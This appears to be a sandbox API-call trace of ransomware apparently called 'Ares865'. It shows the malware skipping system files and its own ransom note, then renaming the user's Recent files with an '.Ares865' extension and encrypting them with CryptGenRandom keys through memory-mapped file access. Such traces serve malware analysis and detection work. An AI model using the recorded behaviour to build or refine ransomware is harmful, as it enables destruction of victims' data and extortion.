lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="windows") returned -1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="bootmgr") returned -1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="temp") returned -1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="pagefile.sys") returned -1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="boot") returned -1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="ids.txt") returned -1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="ntuser.dat") returned -1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="perflogs") returned -1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="MSBuild") returned -1 [0093.087] lstrlenW (lpString="8i3kb8cVxORR7aFvoPjH.mkv.lnk") returned 28 [0093.088] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\8CxiQK6E8YEe.lnk") returned 53 [0093.088] lstrcpyW (in: lpString1=0x2cce44a, lpString2="8i3kb8cVxORR7aFvoPjH.mkv.lnk" | out: lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk") returned="8i3kb8cVxORR7aFvoPjH.mkv.lnk" [0093.088] lstrlenW (lpString="8i3kb8cVxORR7aFvoPjH.mkv.lnk") returned 28 [0093.088] lstrlenW (lpString="Ares865") returned 7 [0093.088] lstrcmpiW (lpString1="mkv.lnk", lpString2="Ares865") returned 1 [0093.088] lstrlenW (lpString=".dll") returned 4 [0093.088] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2=".dll") returned 1 [0093.088] lstrlenW (lpString=".lnk") returned 4 [0093.088] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2=".lnk") returned 1 [0093.088] lstrlenW (lpString=".ini") returned 4 [0093.088] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2=".ini") returned 1 [0093.088] lstrlenW (lpString=".sys") returned 4 [0093.088] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2=".sys") returned 1 [0093.088] lstrlenW (lpString="8i3kb8cVxORR7aFvoPjH.mkv.lnk") returned 28 [0093.088] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\8i3kb8cVxORR7aFvoPjH.mkv.lnk.Ares865") returned 73 [0093.088] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\8i3kb8cVxORR7aFvoPjH.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\8i3kb8cvxorr7afvopjh.mkv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\8i3kb8cVxORR7aFvoPjH.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\8i3kb8cvxorr7afvopjh.mkv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.089] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\8i3kb8cVxORR7aFvoPjH.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\8i3kb8cvxorr7afvopjh.mkv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.089] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6744) returned 1 [0093.089] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.090] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.090] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.090] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.090] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.090] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.091] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d60, lpName=0x0) returned 0x15c [0093.091] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d60) returned 0x190000 [0093.091] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.092] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.092] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.092] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.092] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0093.092] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.092] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0093.092] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.092] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.093] CloseHandle (hObject=0x15c) returned 1 [0093.093] CloseHandle (hObject=0x118) returned 1 [0093.094] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.094] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.094] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.094] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d4c4140, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3d4c4140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3d4c4140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xa0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9CQSf1.lnk", cAlternateFileName="")) returned 1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="aoldtz.exe") returned -1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2=".") returned 1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="..") returned 1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="windows") returned -1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="bootmgr") returned -1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="temp") returned -1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="pagefile.sys") returned -1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="boot") returned -1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="ids.txt") returned -1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="ntuser.dat") returned -1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="perflogs") returned -1 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2="MSBuild") returned -1 [0093.094] lstrlenW (lpString="9CQSf1.lnk") returned 10 [0093.094] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\8i3kb8cVxORR7aFvoPjH.mkv.lnk") returned 65 [0093.094] lstrcpyW (in: lpString1=0x2cce44a, lpString2="9CQSf1.lnk" | out: lpString1="9CQSf1.lnk") returned="9CQSf1.lnk" [0093.094] lstrlenW (lpString="9CQSf1.lnk") returned 10 [0093.094] lstrlenW (lpString="Ares865") returned 7 [0093.094] lstrcmpiW (lpString1="Sf1.lnk", lpString2="Ares865") returned 1 [0093.094] lstrlenW (lpString=".dll") returned 4 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2=".dll") returned 1 [0093.094] lstrlenW (lpString=".lnk") returned 4 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2=".lnk") returned 1 [0093.094] lstrlenW (lpString=".ini") returned 4 [0093.094] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2=".ini") returned 1 [0093.095] lstrlenW (lpString=".sys") returned 4 [0093.095] lstrcmpiW (lpString1="9CQSf1.lnk", lpString2=".sys") returned 1 [0093.095] lstrlenW (lpString="9CQSf1.lnk") returned 10 [0093.095] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\9CQSf1.lnk.Ares865") returned 55 [0093.095] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\9CQSf1.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\9cqsf1.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\9CQSf1.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\9cqsf1.lnk.ares865"), dwFlags=0x1) returned 1 [0093.096] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\9CQSf1.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\9cqsf1.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.096] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2571) returned 1 [0093.096] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.096] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.096] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.096] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.097] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.097] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.097] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd10, lpName=0x0) returned 0x15c [0093.097] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd10) returned 0x190000 [0093.098] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.098] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.098] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.098] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.099] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.099] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.099] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.099] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.099] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0093.099] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.099] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0093.099] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.099] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.099] CloseHandle (hObject=0x15c) returned 1 [0093.099] CloseHandle (hObject=0x118) returned 1 [0093.100] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.100] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.100] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.100] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db4fdc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3db4fdc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3db4fdc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xed8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9WRDzpBM.lnk", cAlternateFileName="")) returned 1 [0093.100] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.100] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="aoldtz.exe") returned -1 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2=".") returned 1 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="..") returned 1 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="windows") returned -1 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="bootmgr") returned -1 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="temp") returned -1 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="pagefile.sys") returned -1 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="boot") returned -1 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="ids.txt") returned -1 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="ntuser.dat") returned -1 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="perflogs") returned -1 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2="MSBuild") returned -1 [0093.101] lstrlenW (lpString="9WRDzpBM.lnk") returned 12 [0093.101] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\9CQSf1.lnk") returned 47 [0093.101] lstrcpyW (in: lpString1=0x2cce44a, lpString2="9WRDzpBM.lnk" | out: lpString1="9WRDzpBM.lnk") returned="9WRDzpBM.lnk" [0093.101] lstrlenW (lpString="9WRDzpBM.lnk") returned 12 [0093.101] lstrlenW (lpString="Ares865") returned 7 [0093.101] lstrcmpiW (lpString1="pBM.lnk", lpString2="Ares865") returned 1 [0093.101] lstrlenW (lpString=".dll") returned 4 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2=".dll") returned 1 [0093.101] lstrlenW (lpString=".lnk") returned 4 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2=".lnk") returned 1 [0093.101] lstrlenW (lpString=".ini") returned 4 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2=".ini") returned 1 [0093.101] lstrlenW (lpString=".sys") returned 4 [0093.101] lstrcmpiW (lpString1="9WRDzpBM.lnk", lpString2=".sys") returned 1 [0093.101] lstrlenW (lpString="9WRDzpBM.lnk") returned 12 [0093.101] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\9WRDzpBM.lnk.Ares865") returned 57 [0093.101] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\9WRDzpBM.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\9wrdzpbm.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\9WRDzpBM.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\9wrdzpbm.lnk.ares865"), dwFlags=0x1) returned 1 [0093.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\9WRDzpBM.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\9wrdzpbm.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.103] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3800) returned 1 [0093.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.103] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.104] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.104] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.104] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11e0, lpName=0x0) returned 0x15c [0093.104] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11e0) returned 0x190000 [0093.105] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.105] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.105] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.107] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\a5xHFgAnq.lnk.Ares865") returned 58 [0093.107] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\a5xHFgAnq.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\a5xhfganq.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\a5xHFgAnq.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\a5xhfganq.lnk.ares865"), dwFlags=0x1) returned 1 [0093.108] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\a5xHFgAnq.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\a5xhfganq.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.108] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3483) returned 1 [0093.108] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.109] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.109] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.109] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.110] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10a0, lpName=0x0) returned 0x15c [0093.110] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10a0) returned 0x190000 [0093.110] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.111] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.111] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.113] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AAhmMGDil.lnk.Ares865") returned 58 [0093.113] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AAhmMGDil.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\aahmmgdil.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AAhmMGDil.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\aahmmgdil.lnk.ares865"), dwFlags=0x1) returned 1 [0093.114] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AAhmMGDil.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\aahmmgdil.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.114] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2456) returned 1 [0093.114] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.115] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.115] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.115] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xca0, lpName=0x0) returned 0x15c [0093.115] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xca0) returned 0x190000 [0093.115] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.116] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.116] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.117] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\anDCO4sGwz.lnk.Ares865") returned 59 [0093.117] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\anDCO4sGwz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\andco4sgwz.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\anDCO4sGwz.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\andco4sgwz.lnk.ares865"), dwFlags=0x1) returned 1 [0093.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\anDCO4sGwz.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\andco4sgwz.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.119] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5008) returned 1 [0093.119] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.120] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.120] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.120] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1690, lpName=0x0) returned 0x15c [0093.122] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1690) returned 0x190000 [0093.123] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.123] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.123] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.125] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AunB46i.ots.lnk.Ares865") returned 60 [0093.125] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AunB46i.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\aunb46i.ots.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AunB46i.ots.lnk.Ares865" (normalized: 